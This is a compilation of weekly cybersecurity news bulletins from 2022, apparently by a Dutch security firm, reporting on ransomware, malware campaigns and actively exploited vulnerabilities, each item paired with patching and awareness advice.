Go seems to be growing in popularity among cybercriminals given its platform-independent support for the programming language. This allows cybercriminals to effectively use a common codebase to attack different operating systems. Be aware of the sender of the mail and the attachment and be careful about enabling macros.

Another new malware written in Go is the BianLian ransomware. This ransomware was first seen in mid-July. The cybercriminals behind this ransomware claim that 15 organizations have now been victimized. By the way, BianLian is separate from the banking trojan of the same name!

Furthermore, a new ransomware strain written in Golang has been discovered. This ransomware, called Agenda, targets healthcare and educational institutions in Indonesia, Saudi Arabia, South Africa and Thailand. A characteristic of Agenda is that it can reboot systems in safe mode and has multiple modes to run.

Finally, QNAP is urging users of its Photo Station software to update their NAS device immediately. The reason is that a vulnerability in this software is being exploited by cybercriminals behind the Deadbolt ransomware.

Make sure you know what systems and applications are being used within your organization and install updates as soon as possible. Further, make sure your employees are aware of the importance of updating. Not only for their business devices, but with the intertwining of business and private, also the private environment.

Critical vulnerabilities still allow cybercriminals to gain access to systems and data. Alternatively, these vulnerabilities can be exploited by cybercriminals to increase their privileges within your systems.

Last Friday, the CISA (U.S. Cybersecurity and Infrastructure Security Agency ) added ten new, actively exploited vulnerabilities, to its list. These vulnerabilities include: CVE-2022-26352 – dotCMS Unrestricted Upload of File Vulnerability, CVE-2022-24706 – Apache CouchDB Insecure Default Initialization of Resource Vulnerability, CVE-2022-24112 – Apache APISIX Authentication Bypass Vulnerability and CVE-2022-22963 – VMware Tanzu Spring Cloud Function Remote Code Execution Vulnerability.

In addition, a critical vulnerability was discovered in Atlassian Bitbucket Server and Atlassian Data Center. More information on versions and updates is available on the Atlassian Confluence website.

Furthermore, a detailed blog has been published regarding two vulnerabilities in WatchGuard Firebox and XTM appliances. The vulnerabilities in question are CVE-2022-31789 and CVE-2022-31790. Software patches for both vulnerabilities were published by Watchguard in June 2022. The vulnerabilities and associated software patches are discussed in more detail in the following security advisories from the manufacturer:

• WGSA-2022-00015
• WGSA-2022-00017
• WGSA-2022-00018

The blog contains sufficient detail to exploit the software vulnerabilities. Therefore, the advice is to apply the software patches as soon as possible.

Finally, Lockbit, a group that deals with ransomware attacks, has warned against the use of triple extortion, a triple extortion tactic. In doing so, the battle between attackers and victims hardens. If the ransom for the hostage data is not paid, the threat is not only to publish the data, but also to carry out a DDoS attack on the already affected organization. This puts even more pressure on the victims to pay up.

Updating systems and applications remains important to keep cybercriminals out. Apple has released an update to fix two actively attacked zero-day leaks that allow attackers to gain full control of a system. If possible, the advice is to install the updates as soon as possible.

Research shows that more than 80,000 Hikvision cameras are still vulnerable. An update to fix this vulnerability was released almost a year ago. Thousands of systems, in use by some 2,300 organizations in more than 100 countries, still appear to be vulnerable.

If your organization is hit by a ransomware attack, the first priority is to repel it and limit the damage as much as possible. In doing so, it is important not only to take measures to prevent a new attack from the outside, but also to investigate whether there may be traces of other attackers. In this case, an organization was hit by three different groups in the space of two weeks.

In recent weeks there have been many reports of ransomware attacks in the media. Artis, home shopping chain Casa, dental chain Colosseum Dental Benelux, supermarket chain 7-Eleven and the British water company South Staffordshire Water: these days every organization that has data is interesting for cybercriminals. In the case of the water company, the attackers claim to have far-reaching control over the systems that allow them to alter the chemical composition of the water.

We also see a lot of activity on the development side. BlueSky Ransomware is an emerging family that uses various techniques to circumvent security measures. BlueSky targets Windows systems and uses “multithreading” to encrypt files even faster. Therefore, make sure that you have basic measures arranged such as network segmentation, creating and being able to restore backups and installing available updates.

In addition, new functionality has been added to the SOVA malware to encrypt Android devices. The SOVA malware targets more than 200 apps for banking, crypto trading and digital wallets, stealing user data and cookies.

Furthermore, Palo Alto has issued an alert regarding a critical vulnerability, CVE-2022-0028, in its PAN OS that is currently being exploited. This is a software flaw that allows a specific misconfiguration. This allows an attacker to use the firewall to execute a reflective DOS on another target on the Internet.

Finally, VMware has published an advisory regarding a number of vulnerabilities. By combining two of these vulnerabilities, there is a chance of an unauthenticated remote code execution. Patches are available, the advice is to install them as soon as possible.

All devices connected to the Internet are vulnerable to an attack by cybercriminals. This includes VoIP servers and phones. Elastix VoIP phone servers and VoIP phones that use Digium software are vulnerable to a campaign designed to exfiltrate data by downloading and executing scripts or malware that allows cybercriminals to gain control over (parts of) the system.

Besides servers, cell phones and PCs, PLCs (Programmable Logic Controllers) and HMIs (Human Machine Interface) are also vulnerable to Sality malware. Cybercriminals have managed to infect these industrial control systems. Sality creates a peer-to-peer botnet for password cracking and cryptocurrency mining, for example.

Furthermore, there is a phishing campaign kit active targeting PayPal users that attempts to steal from users a large set of personal information. This kit is hosted through legitimate WordPress websites that have been hacked.

In addition, there is a large-scale attack on WordPress sites using the Kaswara Modern WPBakery Page Builder Add-on. This contains security vulnerability CVE-2021-24284 that allows unauthenticated attackers to upload malicious PHP files to gain control of the website. As there is no security update available and the add-on is now no longer offered, the advice is to remove this plug-in.

In all cases, it is important to use multifactor authentication and good network segmentation as much as possible.

When spreading malware, methods such as sending an attachment in the mail, through updates outside the official stores or through logging into dubious websites are often thought of. PennyWise is a malware that poses as a Bitcoin mining application that can be downloaded from YouTube. While watching the YouTube video, viewers are persuaded to download a secure file. However, that file does not contain the Bitcoin software but the PennyWise malware. Therefore, be alert when it comes to downloading and installing software and only use the regular stores.

Updating software remains essential. Microsoft released new patches for 84 vulnerabilities last Tuesday, including for a critical vulnerability (CVE-2022-2294), which is currently being actively exploited.

Furthermore, a new phishing campaign has been spotted that takes advantage of the attention to the recently published Follina vulnerability. This campaign is used to spread Rozena malware. The starting point for this attack chain, observed by Fortinet, is an infected Office document that, when opened, connects to a Discord CDN URL to retrieve an HTML file (“index.htm”). This HTML file in turn invokes the diagnostic utility using a PowerShell command after which the next step in the attack chain is taken. Therefore, make sure your people are aware of the type of emails they receive and which attachments they open.

A new type of ransomware called Session Manager is currently active. This rogue session manager is disguised as a module for Internet Information Services (IIS) and exploits one of the ProxyLogon flaws in Microsoft Exchange servers. The use of this backdoor and the fact that this ransomware is so far poorly detectable by virus scanners enable cyber criminals to operate undisturbed. Updating systems and setting up multi-factor authentication are important to keep cybercriminals out.

In addition, the FBI is warning about the MedusaLocker ransomware. This ransomware is brought into organizations by cybercriminals through vulnerable rdp connections and by employees opening infected email attachments. Some measures you can take right now to reduce the risk: disable unused ports, make sure systems are updated as soon as possible and make sure employees are alert to phishing messages.

The latest research data from WatchGuard Threat Lab shows that the number of ransomware detections in the first quarter of 2022 is double the total reported volume in 2021. Therefore, make sure your organization has basic cyber hygiene in place and is prepared for a cyber incident.

The annual Cybersecurity Beeld Nederland (CSBN), drawn up in collaboration with the National Cyber Security Centre (NCSC), shows that the digital resilience of many organizations in the Netherlands is still insufficient. Making and testing backups or introducing multi-factor authentication are basic measures that have not yet (yet) been adequately implemented in every organisation.

The developments within cybersecurity are moving at lightning speed. Cybercriminals are constantly inventing new ways to penetrate organizations. All equipment with a link to the Internet is vulnerable, including cameras, climate control systems and systems for Internet telephony. Recently, a zeroday vulnerability in a Mitel VoIP server was used to carry out a ransomware attack. A software update for the vulnerability is available. The advice is to update these systems as soon as possible.

Another development is the use of a malware tool that allows cybercriminals to build rogue Windows shortcut (.LNK) files. This tool, Quantum Lnk Builder, allows spoofing of a large number of extensions and offers various possibilities for infecting systems. Quantum Lnk Builder is believed to be affiliated with Lazarus, however, Bumblebee and Emotet also seem to be using .LNK files more and more when attempting to infect a system.

It is important that everyone in the organization knows how to deal with potential phishing emails. A new method is by approaching organizations with an email claiming that the organization is infringing on copyright. In one case, a zip file is sent along with what appears to be a pdf. In practice, however, the file turns out to install ransomware. In the other case, a link is sent along that spreads malware.

Now that multifactor authentication (mfa) is becoming commonplace in more and more organizations, it is becoming more difficult for cybercriminals to log in with stolen user data. By abusing Webview2 apps and stealing the authentication cookies of the intended victim, cybercriminals still try to bypass mfa. Mfa is a good way to create a barrier and make accounts extra secure, however, it also requires users to pay attention when applying it.

In a number of cases, a ransomware attack skips the ‘encryption’ step and focuses mainly on stealing information and the threat of publishing it. Be prepared and make sure you have implemented at least the basic measures.

Installing updates is one way to fix vulnerabilities as quickly as possible. This is especially true for vulnerabilities in operating systems. A vulnerability in FreeBSD systems allows cybercriminals to completely take over systems via wifi. An update for this vulnerability is available. The advice is to install this update as soon as possible.

For an actively exploited vulnerability in Ninja forms, a WordPress plugin for contact forms, an update is being forced by WordPress to fix this vulnerability. Cybercriminals could execute arbitrary code on the website or delete arbitrary files via the vulnerability.

Further, the advice to install the security updates for Citrix Application Delivery Management. These updates fix a problem where cybercriminals could reset admin passwords. This includes all supported versions of Citrix ADM server and Citrix ADM agent (for example, Citrix ADM 13.0 for 13.0-85.19 and Citrix ADM 13.1 for 13.1-21.53).

Finally, Microsoft sees that the BlackCat Ransomware group is still attacking Microsoft Exchange systems that have not yet been updated. According to FBI figures, at least 60 organizations have been victimized between November 2021 and March 2022. Updating systems is an essential step in keeping cybercriminals out.

Many organizations use IT suppliers to a greater or lesser extent, for example to supply software. IT suppliers are thus connected to a large number of different organizations. These connections mean that these suppliers are becoming increasingly popular with cybercriminals. To illustrate, in 2021 there were 28 reports of data breaches at IT suppliers, resulting in 18,000 reports from organizations doing business with these IT suppliers. With the basics in place, we provide some tools to improve cybersecurity within your organization. Also ask your IT vendor about how they handle data and what measures they have in place to reduce the risk of a cyber incident.

The United States Cybersecurity and Infrastructure Agency (CISA) has added 36 new vulnerabilities to the overall list. These 36 vulnerabilities are currently being actively exploited and are located in software and systems from Cisco, Netgear, Adobe and Microsoft, among others. We recommend checking whether your systems are vulnerable and updating them as soon as possible.

Several vulnerabilities have also been found in the A8Z3 thermal imaging camera that allow the device to be taken over by cybercriminals. Several vulnerabilities have also been discovered in the LenelS2 HID Mercury access control system that, for example, allow remote unlocking and locking of doors.

Furthermore, researchers have discovered new Linux malware, Symbiote. This malware infects all running processes on compromised systems, stealing user data and giving cybercriminals access. The malware is difficult to trace, however by monitoring anomalous DNS requests this malware could be discovered.

Finally, the Emotet banking trojan is once again causing a stir. This malware makes use of various Office attachments and in its renewed version is able to bypass the security scanners of email gateways. In addition, it steals credit card data. Therefore, make sure that users store login data and confidential information, such as credit card data, in a password safe, for example.

The developments in the field of cybercrime are moving fast. This makes it a great challenge for many organisations to keep up with all the (possible) threats. A new initiative to bundle this information and distribute it quickly is cyberteletext: teletext as we all know it, but with the latest vulnerabilities and the latest news on cyber security.

Last week a warning was issued for a vulnerability in Atlassian Confluence. Updates are available. The advice is to install them as soon as possible. If patching is not possible, Atlassian has described a number of additional mitigating measures.

Google has remedied some vulnerabilities in Android by making patches available. The vulnerabilities CVE-2022-20130 and CVE-2022-20127 make it possible to use Android phones remotely and execute code. There are updates for Android 10, 11, 12 and 12L.

Recently, a new type of phishing campaign has been identified. Microsoft Word documents containing VBA macros are emailed as attachments. These macros then run shellcode contained in the document properties to install SVCReady malware. This malware can collect system information, take screenshots and download documents, among other things. It remains important to stay alert to phishing.

Cybersecurity companies from the US are warning against Chinese hackers. By exploiting vulnerabilities in telecom suppliers, they try to intercept and steal network traffic. They then try to obtain log-in data and use this to log in. Eventually, the attackers can forward the network traffic to their own infrastructure. The advice is to keep all systems up-to-date. A patch management system can help with this.

VMware has released security updates to address vulnerabilities in Workspace ONE Access, Identity Manager, vRealize Automation, Cloud foundation and vRealize Suite Lifecycle Manager. The vulnerabilities allow cyber criminals to gain administrator rights. A proof of concept is available for vulnerability CVE-2022-22972. The advice is to install the available security updates as soon as possible.

Microsoft also warns of a new vulnerability, CVE-2022-30190. To exploit this Microsoft Office RCE vulnerability (Follina) as a cybercriminal, a user must open a Word document. These documents are often shared by e-mail, therefore the advice is, as with phishing, to make users aware of the risk you run when opening files from the mail if they come from an unknown sender or if it is a file that you don’t expect. A service update and article with guidance are available, although at this moment there is no patch available yet.

The annual Verizon Data Breach Investigation Report (DBIR) shows that globally, web application attacks are increasingly responsible for cybersecurity incidents in healthcare. The healthcare sector is increasingly being attacked by cybercriminals and is also more often the victim of ransomware attacks. Most of the attacks have a financial motive, according to the report.

Ransomware groups are known for taking your files hostage. Recently we hear about a group that pretends to have other motives. RansomHouse is a ransomware group that uses a different business model, focusing primarily on data exfiltration. The motivation for this group is that they want to use extortion to point out to organizations that they are not investing enough in the security of their data, networks and systems or that they are not respecting their bug bounty program. The group claims that after payment it will help the affected organization to protect itself against future attacks. In addition, the affected organization receives a report describing which vulnerabilities were used and how they were used to gain entry.

What many organizations do not realize, or insufficiently, is that by using third-party JavaScript they run an increased risk of being hit by a cybersecurity incident. Third-party scripts allow cybercriminals to introduce malicious code into an organization’s web environment. Many organizations use third-party code for, for example, forms, processing orders and payments or tracking visitor behavior. Be alert to the use of third-party code. Know which code is used and check whether this code is also actively maintained.

The 2022 SaaS Security Survey Report identifies the risks and dangers associated with the use of SaaS solutions. In particular, configuration errors are cited as the cause of cybersecurity incidents. One of the reasons for this is that several departments have access to the security settings, without the people being trained or having cybersecurity as their focus area.

Cisco warns of an actively attacked vulnerability in IOS XR router software, which allows attackers to access the Redis database and modify information there, write arbitrary files to the container file system, and retrieve information about the Redis database. An update is available, the advice is to install it as soon as possible.

Educational institutions with a WordPress website that use the Premium tool ‘School Management’ are currently vulnerable due to a backdoor in this plug-in. The plug-in provides educational institutions with capabilities such as scheduling distance education, attendance tracking, expense tracking, enrolling new students, and document management. The vulnerability allows cybercriminals to run arbitrary PHP code, can let them access or alter the website’s contents, elevate privileges and assume complete control of the site. An update is available (version 9.9.7), please update to the most recent version as soon as possible.

Last week a political agreement was reached on new European regulations in the field of cybersecurity, NIS 2. Important changes are that the regulations will also apply to medium-sized and large organizations and that the number of sectors that are considered critical has been expanded. Some aspects mentioned in NIS 2 are patching vulnerabilities, risk management measures and the period within which incidents must be reported to the authorities.

A critical vulnerability in Zyxel firewalls allows cybercriminals to execute arbitrary code remotely. This includes downloading malware or misusing other vulnerabilities to penetrate the network. The vulnerability applies to both firewalls and VPNs. We have now received the first signals that this vulnerability is also actively being used by cyber criminals. An update is available, our advice is to update this equipment as soon as possible.

The update advice also applies to SonicWall SMA1000 series 6200, 6210, 7200, 7210 and 8000 devices with firmware versions 12.4.0 and 12.4.1. Cyber​​criminals can access internal resources and send potential victims to rogue websites.

Linux and Solaris (Unix) systems are also under attack by cybercriminals. For example, malware called BPFdoor has recently been discovered, which has been targeting Linux and Solaris systems undetected for the past five years. The malware allows cybercriminals to remotely connect to a Linux shell to gain full access to an infected system. The malware has gone undetected for so long because the comand & control connection is initiated from outside. A firewall offers no protection against this malware and the malware can respond to commands from any IP address. A set of technical indicators (Yara rules, hashes) is now available with which you can scan a Linux or Solaris system.

Cybercriminals are constantly developing new ways to spread malware. In addition, we now also see that cyber criminals don’t stick to one specific way when spreading. This flexibility, combined with an increasing freedom of choice, means that organizations must be constantly alert and avoid tunnel vision when implementing cybersecurity measures.

Mandiant has researched worldwide trends in cybersecurity incidents, such as ways to distribute malware, and published them in an annual report. They state, among other things, that we have all become better at detecting incidents more quickly. In response to our efforts, attackers will of course remain flexible. At 37% of the time, attackers still most often enter by exploiting a vulnerability. Phishing is a lot less popular method with only 11%. The statistics on supply-chain attacks are striking. We now know last year’s attack on Kaseya. These attacks are rapidly gaining popularity, at 17% from 1% the year before.

We continue to see that exploiting vulnerabilities is a common way for attackers to get in. It is therefor extremely important to ensure that the management of hardware and software within your organization is in order. That is, keeping a good record of what hardware and software is in use, and ensuring that it is kept up-to-date. Qualys can help you with this. By ensuring that timely action is taken on security updates, you reduce the attack surface within your organization.

There is also a warning about Raspberry Robin, where malware is spread via USB sticks. Make sure your employees are aware of the risks associated with using unknown external equipment.

The NSA and FBI, along with cybersecurity agencies from multiple countries, have compiled an overview of the key vulnerabilities exploited in 2021. Unfortunately, these vulnerabilities are still causing victims today. The overview includes Proxylogon and Log4Shell. In addition to these most commonly used vulnerabilities, new vulnerabilities are regularly added that pose a potential threat to your organization.

Another vulnerability that is currently being actively exploited is the vulnerability in VMware Workspace One. Therefore, make sure you stay informed about new updates and install them as soon as possible.

Updating systems and software does not only apply to the business environment, but also to devices that are intended for home or personal use. The government has now obliged sellers of digital products to keep them working and safe. This means that there will also be software updates for smart TVs, printers and cameras, for example. Also in this case: make sure you know which equipment is connected to the internet and update this equipment as soon and if possible.

Furthermore, Onyx ransomware seems to destroy files larger than 2MB instead of encrypting them. According to researchers, the data in the files is overwritten with worthless data during encryption, so that decryption no longer yields the original file information even after the ransom has been paid. Since the same encryption routine has been seen with Chaos ransomware, it seems that overwriting is not a flaw in the encryption but a deliberate choice. Therefore, always ensure that you take action timely when a new vulnerability is published.

Among other things, cyber criminals use vulnerabilities in software to penetrate organizations. At least eighty zero-day vulnerabilities were used in 2021, more than a doubling compared to 2020. Three quarters of the zero-days discovered last year exploited vulnerabilities in products from Apple, Google and Microsoft. Therefore, install the available patches as soon as they are published.

Cisco, QNAP and Oracle, among others, released updates last week. In the case of Cisco to address a serious vulnerability in the Cisco Umbrella Virtual Appliance (VA). This vulnerability allowed attackers to remotely steal administrative credentials. QNAP has released an update for its NAS systems related to Apache HTTP vulnerabilities. Oracle has announced and fixed 520 new vulnerabilities in its April update.

Research further shows that malware groups still heavily use phishing to infiltrate. With new measures against the use of macros in Microsoft Office documents, these groups are looking for ways to get around these cybersecurity measures. Make sure your people are prepared for these phishing scams.

Several updates were released last week for critical vulnerabilities that are being actively exploited. Google released an emergency patch for an actively attacked zero-day vulnerability in Chrome, and Microsoft Windows and VMware Workspace ONE Access have also released patches. The advice is of course to install available patches as soon as possible.

In previous Wakeup Wednesday posts, we reported various variants of malware targeting mobile phones. Research by Proofpoint shows that in February there was a 500% increase in the number of attempts to deliver malware for mobile devices in Europa. Malware for mobile devices is becoming more sophisticated. This involves recording telephone and video calls, audio and video recordings stored on the device and destroying data stored on the device. Be alert for messages containing links, voice messages, or notifications for updating apps outside the regular app stores.

Mobile phone play an increasingly prominent role in our lives, both professionally and privately. Therefore, be aware of malware that targets Android devices. The Android malware Octo is a new version of ExoCompact, the source code of which was leaked in 2018. The most dangerous thing about the updated variant is that the cybercriminal can remotely take control of the device and perform malicious actions via the victim’s device. Only update apps with versions released through official channels, such as the App Store or Google Play.

Another malware campaign currently seen in practice is aimed at the distribution of the new information-stealing malware META. META is growing in popularity among cybercriminals and is currently actively used in attacks. It is deployed to steal passwords stored in Chrome, Edge and Firefox as well as cryptocurrency wallets. META is distributed in the traditional way, as a mail attachment. Be alert if you receive attachments from strangers and be careful when enabling macros!

Other information-stealing malware currently in active use are FFDroider and Lightning Stealer. These also use passwords stored in Chrome, Edge and Firefox. FFDroider is distributed via cracked versions of installers and freeware with the main purpose of stealing cookies and credentials associated with popular social media and e-commerce platforms. In addition, the stolen information is used to log into the accounts in order to record other personal account-related information. Lightning stealer works in a similar way and can steal Discord tokens, cryptocurrency wallet data, and details related to cookies, passwords, and credit cards.

During the patch Tuesday of April 2022, Microsoft released patches for 119 new vulnerabilities. The most severe vulnerability is a remote code execution vulnerability in the Remote Procedures Call Runtime, registered as CVE-2022-26809. This vulnerability allows an unauthenticated remote attacker to execute code with the same privileges as the RPC service. This service operates in the context of the system user account Network Service.

VMware has published Security Advisory VMSA-2022-0011 related to eight different CVEs in VMware Workspace ONE Access. Three of these CVE’s have a score of 9.8 and are the subject of this writing: one Remote Code Execution and two Authentication Bypass vulnerabilities. The Remote Code Execution vulnerability also exists in the following related VMware products: VMware Identity Manager, VMware Cloud Foundation and vRealize Suite Lifecycle Manager.

Cyber ​​incidents are often caused by critical vulnerabilities that are not adequately addressed, by configuration errors or by users inadvertently sharing their data with third parties.

Zyxel warns of a critical vulnerability that could allow cybercriminals to gain administrative access to the firewall. Install the software updates as soon as possible.

Totolink routers that have not received the latest software updates are vulnerable to a variant of the Mirai botnet. The variant called Beastmode has five new exploits, of which 3 types target various Totolink routers. Here too, the advice is to update the software as soon as possible, where possible.

In addition to the notification for Totolink routers, there is also a warning for users of D-link routers. The vulnerability, designated CVE-2021-45382, resides in D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L. These models are end-of-life, so no new updates are released. It is therefore advised to take these models offline as soon as possible and to replace them with newer routers.

Borat, a new remote access trojan (RAT), offers cybercriminals several options for attacking. For example, Borat can be used as ransomware, spyware, for DDoS attacks. Borat offers the attacker the opportunity to choose how to deploy the malware, so be careful about which software is installed and only download applications from reliable sources and websites.

It is nothing new that critical vulnerabilities are used by cybercriminals to gain access to third-party systems and data. However, we see that various vulnerabilities are still being exploited, despite patches being released. Updating systems and applications is an essential part of a good cybersecurity policy.

For example, Log4j is still actively abused by cyber criminals to install backdoors that can be used at a later stage. In addition, Log4j is actively being exploited to install cryptocurrency miners on vulnerable VMware Horizon servers.

A new phishing campaign, aimed at taking over email conversations, is being used to spread the IcedID info-stealing malware. This campaign makes use of vulnerabilities in Microsoft Exchange for which software updates are already available.

Sophos has announced that the critical vulnerability in its firewall software is currently being actively exploited. A hotfix is ​​available, we recommend installing it as soon as possible.

The number of attacks that use zero-day vulnerabilities, vulnerabilities that have not been discovered or exploited before and for which no update is yet available, will double by 2021, according to Rapid7.

We advise you to ensure that your systems have the latest software updates, if possible. Make sure your employees are alert and use network segmentation to ensure that attackers cannot penetrate the entire company network unhindered.

Why do things the hard way? This is why there are many portals that allow users to log in with a Google account, Apple ID or Microsoft account. The popularity means that these types of screens are also popular with cyber criminals. They use them in their phishing campaigns. Recently, a new phishing toolkit has become available that makes it easy to counterfeit Chrome browser screens. Be careful where you log in and use multi-factor authentication if possible.

The FBI warns vital sector organizations about AvosLocker ransomware. These ransomware attacks exploit vulnerabilities in Microsoft Exchange. Updates are available for the vulnerabilities used, including ProxyShell. Make sure your systems have the latest security updates.

Qualys research shows that 30 percent of applications, servers and other systems using Log4j are still vulnerable to cyber attacks. This vulnerability puts you at risk because cyber criminals could take over your system remotely. Therefore, install the security updates if possible or take mitigating measures if updating is not possible.

At the beginning of March 2022, we saw a new variant of the Lorenz ransomware. However, there is a big difference between the files encrypted by this ransomware and files encrypted by an earlier version. The main difference: decryption is not possible after paying the ransom. However, our specialists managed to create a decryptor that can decrypt the files.

Cyber criminals are inventive. Time and again they find new ways to spread malware and gain access to third-party systems. In this #WakeUpWednesday, we give three examples.

For example, contact forms on the website are used to distribute Bazar Backdoor malware. By requesting a quote, a conversation is started. Subsequently, following the initial application, an ISO file is sent during the conversation with additional information that is relevant to the application. By using file sharing services, such as Wetransfer, for this additional information and letting people unpack the files themselves, an attempt is made to circumvent the security.

Additional add-ons for popular online games are also used. In this example, a YouTube channel is promoting an add-on for the popular game Valorant. Users who want to download the add-on are directed to a page where they can download a RAR file. This contains an installation file that does not install the add-on for the game, but RedLine stealer, malware that focuses on stealing passwords, among other things.

We close the list with Escobar, Android malware aimed at stealing Google Authenticator MFA codes. Escobar is the enhanced version of the Aberebot Android banking trojan. In addition to the MFA codes, the malware is also able to take control of the devices by using VNC. The options for recording sound and using the camera also enable the apps to retrieve user data. Of course with the ultimate goal of obtaining enough data to gain control over the bank details.

In addition to IT systems, OT systems are increasingly faced with cybersecurity threats. Research by Dragos shows that the number of vulnerabilities has doubled in 2021 compared to 2020. Ransomware is the biggest threat.

A Linux vulnerability that affects all kernels since version 5.8, including Android, has been disclosed under the name Dirty Pipe (Linux Kernel Exploit). This vulnerability allows data, even if the files are read-only, to be overwritten. This may result in permissions being increased. This allows local users to get root privileges. NAS operating systems from QNAP, QTS and QuTS Hero also use the Linux kernel and are therefore vulnerable.

Finally, we also keep a close eye on developments related to Wiper malware. A new version, RuRansom, is not ransomware, even though the name suggests otherwise. In this case too, it concerns Wiper malware that, for the time being, affects systems with an IP address that can be related to Russia.

Cybercrime can focus on disrupting primary business processes or disrupting critical services. For example, last week not only satellite connections were affected, 5800 wind turbines in Germany and central Europe were also taken offline.

Nvidia has fallen victim to cybercrime in several ways. In addition to the fact that malicious parties have stolen a Terrabyte of data during an incident, two stolen driver certificates are used to spread malware. Even though the certificates have expired, they can still be used in Windows to install drivers. Finally, the stolen data is used to pressure Nvidia to change the firmware for specific series of graphics cards (GeForce RTX 30 Series). The change is intended to support the crypto mining industry, among other things.

Furthermore, various vulnerabilities have been patched in Exchange Server and Android. The vulnerability in Exchange Server (CVE-2022-23277) has an impact score of 8.8 and allows remote code execution. The problem affects Exchange 2013, 2016 and 2019. An authenticated attacker can execute code with elevated privileges by using this vulnerability. Rights can also be increased with the vulnerability in Android. Updates have been made available for Android 10, 11 and 12.

Install the available software updates as soon as possible. Also be aware of updates that are made available for all kinds of other systems that you have connected to the internet at home.

Over the past week we have noticed that the situation considering Ukraine has escalated both physically and digitally. The Tesorion Threat Intelligence team has been monitoring various open source sources since mid-January. We see that the attacks within the Ukraine are drastically increasing and that Wiper malware has been detected, among other things. The purpose of this malware is to completely disable the affected computers. This is different from ransomware, where files are encrypted and the attackers make ransom demands. With this wiper, the files are destroyed and there is often no turning back. Therefore, be extra vigilant with e-mail messages, phone calls and approaches via social media.

The Dutch fraud helpdesk states that in the first six weeks of 2022, more than 10.5 million euros in damage has already been suffered due to CEO fraud, fake telephone calls and misuse of company names. In addition to training the cyber awareness of employees, it is also important as an organization to know what is being published about your organization, especially on the deep and dark web. Think, for example, of stolen login details with which cyber criminals can gain access to your systems.

Research by Fortinet shows, among other things, that ransomware is not only increasing, but also becoming more aggressive and devastating. In addition, the Global Threat Landscape Report shows that Linux systems are also increasingly being targeted. Make sure your organization is prepared, pay attention to increasing the cyber awareness of your employees.

The widely used Microsoft Teams now also appears to be used by hackers. They use the platform to spread malware. By logging in with data obtained through phishing or bought on the dark web, the hacker can share a file. As soon as this file is opened by another user, the malware starts working, with all its consequences. Make sure your employees are resilient and alert when it comes to phishing and opening unknown files.

A malicious app has been found in the Google Play Store. The app Fast Cleaner pretends to be an app that will clean up the device and thus improve battery life, while in reality it installs banking malware during an invisible update. There have already been more than 50,000 downloads of this app, despite reviews pointing out its malicious intent. Be vigilant about the apps you install and don’t simply trust everything.

The popular WordPress plugin Updraft Plus suffers from a critical vulnerability (known as CVE-2022-0633) that allows all website users to download the latest database backup that may contain privacy-sensitive information. Normally this backup should only be available to a select group of users, but due to this vulnerability all users with the least privileges can also download it. Because of the critical situation, WordPress has forced the update (version 1.22.3 or 2.22.3) on millions of websites.

In last week’s update we already mentioned the vulnerability in Adobe Commerce and Magento Open Source. After this, another vulnerability was discovered with a CVSS score of 9.8 (CVE-2022-24078). It also appears that the Log4j vulnerability, which came to light at the end of 2021, is still being abused. Furthermore, VMware recently made updates available for 6 vulnerabilities with a CVSS score ranging between 5.3 and 8.8. We keep emphasising, keep your software and devices up-to-date to stay ahead of cyber attacks.

Last week the news came out that the well-known ransomware group Conti and the TrickBot group have joined forces. This strengthens their position and gives them the opportunity to develop better malware. Ransomware attacks continue to keep us busy, so protect your organisation against them.

Several companies have made updates available in the past week due to critical vulnerabilities. It is important to always keep your devices and software up to date, part of having your basics in order.

First of all, Apple released an update last week. It is about fixing a vulnerability, known as CVE-2022-22620, in WebKit. This is a basic component commonly used in browsers. After exposure to malicious web content, code can be executed on Apple devices using this vulnerability. Update your devices to the latest software versions to avoid being vulnerable. Adobe also released an update to patch a critical vulnerability known as CVE-2022-24086. It concerns a vulnerability in Adobe Commerce and Magento Open Source. Lastly, Google has also released an update for the Chrome browser. The update will be installed automatically in the course of time, but this can already be done manually. Several vulnerabilities are hereby fixed, some of which have also been labelled critical.

A German group of hackers, the Chaos Computer Club, recently found more than 50 data leaks at various companies and organisations, including the Dutch Ministry of Health, Welfare and Sport. By means of various vulnerabilities, including database servers without authentication and unsecured MySQL servers, the hackers were able to access all kinds of personal data. All data breaches have been reported to the companies concerned and most of them have taken action to resolve the vulnerabilities. The group did not make use of the data found, but unfortunately this often happens. Make sure you protect your data, for example by using encryption, and do not become a victim of a data breach.

With the attacks on several companies in the oil industry and an attack on freight handler Swissport, there is currently a lot of activity in the field of ransomware again. The impact of the attacks on business processes is significant. Loading and unloading ships is not possible or is subject to significant delays. Also at Swissport, part of the IT systems for scheduling personnel, aircraft and freight are temporarily unavailable.

In recent weeks, much has been said and written about the mandatory app for Olympic athletes, counselors and journalists. In addition to the advice to leave your own devices at home and not to take them to China, it is good to be aware of possible risks in the field of cybersecurity.

Be aware of the information you share, including on business platforms such as LinkedIn. Information such as your job description, information about systems and applications used can be used by cyber criminals. According to the AIVD, for example, Chinese and Russian secret services have approached thousands of employees at Dutch high-tech companies with the aim of corporate espionage.

Updating applications and systems is essential for your cybersecurity. For example, the Apache Log4j vulnerability is currently being actively exploited. Furthermore, a vulnerability in Microsoft Defender allows cybercriminals to evade malware detection.

We continue to emphasize that installing security updates is extremely important. However, criminals also abuse this by making fake updates for software containing malware or ransomware. Microsoft Edge users, for example, were confronted with a fake update, just like Adobe, Google Chrome and Firefox. So always make sure that you only download updates from the supplier itself and not from another party.

Ransomware is a major threat to the continuity of business processes and thus to the existence of an organization. In addition to holding the data hostage, organizations are put under pressure by the threat that the data will be made public. To reinforce that threat even more, social media is now also being used. This puts even more pressure on organizations to pay the ransom.

Another rather daring and unorthodox method that has recently been deployed is to call individuals whose details have been found in the data set held hostage. They were put under pressure with the aim of motivating the organization whose data had been held hostage to pay.

Data is valuable, also for cyber criminals. No organization is spared, as became apparent from the hack on the Red Cross. Data from more than 500,000, often vulnerable people, were stolen.

In addition, cyber criminals have managed to use more than 2,000 corporate email accounts in various spyware campaigns. Kaspersky’s investigations revealed that the spyware was distributed via an email attachment. If the employee opens the attachment and the spyware successfully infects the system, the username and password of the employee in question are sent to the cyber criminal. The attacker can gain access to the system with the stolen data and then further spread the spyware among the employee’s contacts.

Known vulnerabilities used by cyber criminals at a later date are not new. In early December, we warned about critical vulnerabilities in the SonicWall SMA 100 series. A warning was issued this week that these vulnerabilities are currently being actively exploited. There is no workaround available, the advice is to update the software as soon as possible.

